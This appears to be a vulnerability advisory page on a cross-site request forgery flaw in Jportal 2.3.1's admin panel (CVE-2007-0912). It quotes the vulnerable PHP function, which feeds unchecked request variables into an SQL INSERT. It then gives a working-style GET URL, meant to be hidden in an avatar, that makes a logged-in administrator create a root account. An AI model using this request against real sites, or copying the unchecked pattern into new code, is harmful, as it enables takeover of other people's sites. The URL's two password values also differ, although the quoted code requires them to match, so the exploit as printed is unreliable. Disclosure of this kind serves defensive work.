Bug: Jportal 2.3.1 CSRF vulnerability ( Ascii Version )

Search:
WLB2

Jportal 2.3.1 CSRF vulnerability

Published
Credit
Risk
2007.02.15
dzitu
Medium
CWE
CVE
Local
Remote
CWE-352
CVE-2007-0912
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
9.3/10
10/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
Complete
Complete

Type: CSRF Attack / Input Validation Error
Remote: Yes
Version: 2.3.1 (very possible, that older versions are vulnerable too)
Problem is in admin/admin.adm.php:

function add_admin() {

global $name, $mail, $nick_, $action, $user_tbl, $access;
global $nick, $PHP_SELF, $_pass, $pass_, $acce, $op, $goto;

if($access=='root') {

if($_pass==$pass_) {

if($acce[news]=='') $acce[news]='n';
if($acce[info]=='') $acce[info]='n';
if($acce[art]=='') $acce[art]='n';
if($acce[sonda]=='') $acce[sonda]='n';
if($acce[link]=='') $acce[link]='n';
if($acce[forum]=='') $acce[forum]='n';
if($acce[comm]=='') $acce[comm]='n';
if($acce[menu]=='') $acce[menu]='n';
if($acce[bann]=='') $acce[bann]='n';
if($acce[topic]=='') $acce[topic]='n';
if($acce[file]=='') $acce[file]='n';

if($acce[root]<>'t') {

$acce_ = $acce[news].'-'.$acce[art].'-'.$acce[info].'-'.$acce[sonda].'-'.$acce[li
nk].'-'.$acce[forum].'-'.$acce[comm].'-'.$acce[file].'-'.$acce[menu].'-'
.$acce[bann].'-'.$acce[topic];

} else {

$acce_ = 'root';

}

$query = "INSERT INTO $user_tbl VALUES(NULL, '$nick_', '".md5($_pass)."', '$name', now(), '$acce_',
'$mail', 1)";
$result = mysql_query($query);

add_log('dodano administratora (ID '.mysql_insert_id().')');

if($goto=='')
header("Location: admin.php?op=$op");
else
header("Location: $goto");
exit;

As we can see, all variables comes from "nowhere" (i.e. it can be POST, GET, even COOKIE) and it's not
checked, if script was launched by admin through admin panel or not. Due to this fact, if only admin has logged in and
not logged out, if we let him send prepared request, we can get a root account (For example using our profile avatar).

http://vulnerable_jportal/admin.php?op=admin&name=admin&mail=&nick_=admi
n&_pass=pass&pass_=haslo&acce%5Broot%5D=t&ok=dodaj&goto=&cmd=add

gives us root account with name "admin" and password "pass".

D&#380;itu
dzitu (at) poczta (dot) fm [email concealed]

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version